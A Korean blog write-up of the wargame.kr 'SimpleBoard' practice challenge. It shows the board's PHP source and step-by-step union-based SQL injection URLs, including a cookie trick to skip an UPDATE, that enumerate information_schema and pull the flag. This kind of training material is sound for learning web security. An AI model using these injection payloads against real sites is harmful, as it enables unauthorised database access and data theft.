반응형

SimpleBoard

 

Simple Union SQL injection Challenge.
(but you need script... maybe?)

 

 

첫 페이지에 글 리스트가 있고

 

글을 클릭해서 내용을 확인할 수 있다.

 

 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
<?php
    if (isset($_GET['view-source'])){
        if (array_pop(split("/",$_SERVER['SCRIPT_NAME'])) == "classes.php") {
            show_source(__FILE__);
            exit();
        }
    }
 
    Class DB {
        private $connector;
 
        function __construct(){
            $this->connector = mysql_connect("localhost""SimpleBoard""SimpleBoard_pz");
            mysql_select_db("SimpleBoard", $this->connector);
        }
 
        public function get_query($query){
            $result = $this->real_query($query);
            return mysql_fetch_assoc($result);
        }
 
        public function gets_query($query){
            $rows = [];
            $result = $this->real_query($query);
            while ($row = mysql_fetch_assoc($result)) {
                array_push($rows, $row);
            }
            return $rows;
        }
 
        public function just_query($query){
            return $this->real_query($query);
        }
 
        private function real_query($query){
            if (!$result = mysql_query($query, $this->connector)) {
                die("query error");
            }
            return $result;
        }
 
    }
 
    Class Board {
        private $db;
        private $table;
 
        function __construct($table){
            $this->db = new DB();
            $this->table = $table;
        }
 
        public function read($idx){
            $idx = mysql_real_escape_string($idx);
            if ($this->read_chk($idx) == false){
                $this->inc_hit($idx);
            }
            return $this->db->get_query("select * from {$this->table} where idx=$idx");
        }
 
        private function read_chk($idx){
            if(strpos($_COOKIE['view'], "/".$idx) !== false) {
                return true;
            } else {
                return false;
            }
        }
 
        private function inc_hit($idx){
            $this->db->just_query("update {$this->table} set hit = hit+1 where idx=$idx");
            $view = $_COOKIE['view'] . "/" . $idx;
            setcookie("view", $view, time()+3600"/SimpleBoard/");
        }
 
        public function get_list(){
            $sql = "select * from {$this->table} order by idx desc limit 0,10";
            $list = $this->db->gets_query($sql);
            return $list;
        }
 
    }
 
cs

 

 

read.php에서 sqli이 가능하다.

http://wargame.kr:8080/SimpleBoard/read.php?idx=1%20union%20select%201,2,3,4%23

 

 

 

http://wargame.kr:8080/SimpleBoard/read.php?idx=5%20union%20select%201,2,3,4%23

다만, idx=5와 같이 존재하지 않는 내용은 70행의 UPDATE 구문에서 오류가 발생한다.

 

inc_hit()함수가 실행되지 않도록, 쿠키['view']에 /5 union select 1,2,3,4# 를 추가해주면 된다.

 

 

 

 

 

NUM TITLE HIT
1 2 3
4
LIST

 

그럼 이렇게 1,2,3,4가 출력된다. 이를 이용해서 테이블명과 칼럼명을 뽑아내보자

 

 

 

 

 

http://wargame.kr:8080/SimpleBoard/read.php?idx=5%20union%20select%20table_name,2,3,4%20from%20information_schema.tables%23

idx=5 union select table_name,2,3,4 from information_schema.tables#

 

NUM TITLE HIT
README 2 3
4
LIST

 

README가 튀어나왔다.

 

 

 

 

 

 

http://wargame.kr:8080/SimpleBoard/read.php?idx=5%20union%20select%20column_name,2,3,4%20from%20information_schema.columns%23

idx=5 union select column_name,2,3,4 from information_schema.columns#

 

NUM TITLE HIT
flag 2 3
4
LIST

 

flag가 튀어나왔다.

 

 

 

 

 

 

 

 

 

http://wargame.kr:8080/SimpleBoard/read.php?idx=5%20union%20select%20flag,2,3,4%20from%20README%23

GET FLAG!

반응형

'WAR GAME > wargame.kr' 카테고리의 다른 글

Wargame.kr [keypad CrackMe] 풀이  (0) 2020.01.06
Wargame.kr [ip log table] 풀이  (0) 2020.01.04
Wargame.kr [pyc decompile] 풀이  (0) 2020.01.04
Wargame.kr [web chatting] 풀이  (0) 2020.01.01
Wargame.kr [EASY_CrackMe] 풀이  (0) 2020.01.01

+ Recent posts